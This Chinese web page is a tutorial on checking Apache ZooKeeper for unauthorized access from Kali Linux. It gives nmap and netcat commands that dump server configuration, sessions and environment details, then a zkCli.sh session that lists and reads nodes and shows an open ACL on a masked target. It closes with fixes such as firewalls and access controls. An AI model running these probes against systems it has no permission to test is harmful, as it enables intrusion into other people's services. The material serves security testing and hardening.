| kali验证Zookeeper未授权访问测试 | 您所在的位置:网站首页 › zk未授权访问 › kali验证Zookeeper未授权访问测试 |
|
首先nmap扫描一波 root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xxconf命令:输出相关服务配置的详细信息,端口、数据路径、日志路径、session 超时时间,最大连接数等。 root@kali:~# echo conf | nc xx.xx.xx.xx 2181cons命令:列出所有连接到当前服务器的客户端/会话的详细信息。 root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | moredump命令:输出未处理的会话和临时节点,leader 节点有效。 root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more非 leader 节点看不到什么相关信息。 envi命令:输出服务器的详细信息。 root@kali:~# echo envi | nc xx.xx.xx.xx 2181连接测试 安装工具:如在kali下,可以用如下命令安装zookeeper工具,之后即可使用客户端连接工具zkCli.sh。 # apt-get install zookeeper ... #root@kali:~# cd /usr/share/zookeeper/bin/ #root@kali:/usr/share/zookeeper/bin# ls zkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh获取系统相关信息 root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181 Connecting to xx.xx.xx.xx:2181 Welcome to ZooKeeper! JLine support is enabled [zk: xx.xx.xx.xx:2181(CONNECTING) 0] WATCHER:: WatchedEvent state:SyncConnected type:None path:null [zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls / [service, pms, DsMaster, Resource, monitor_lock, zookeeper] [zk: xx.xx.xx.xx:2181(CONNECTED) 1] get / cZxid = 0x0 ctime = Wed Dec 31 19:00:00 EST 1969 mZxid = 0x0 mtime = Wed Dec 31 19:00:00 EST 1969 pZxid = 0x4c0 cversion = 4 dataVersion = 0 aclVersion = 0 ephemeralOwner = 0x0 dataLength = 0 numChildren = 6 [zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service cZxid = 0x2 ctime = Thu Aug 30 02:58:40 EDT 2018 mZxid = 0x2 mtime = Thu Aug 30 02:58:40 EDT 2018 pZxid = 0x1cb884d cversion = 7 dataVersion = 0 aclVersion = 0 ephemeralOwner = 0x0 dataLength = 0 numChildren = 3 [zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl / 'world,'anyone : cdrwa修复方案 1、设置防火墙策略限制 IP 访问 2、不要将 zookeeper 暴露在外网 3、设置用户认证和 ACL |
| CopyRight 2018-2019 实验室设备网 版权所有 |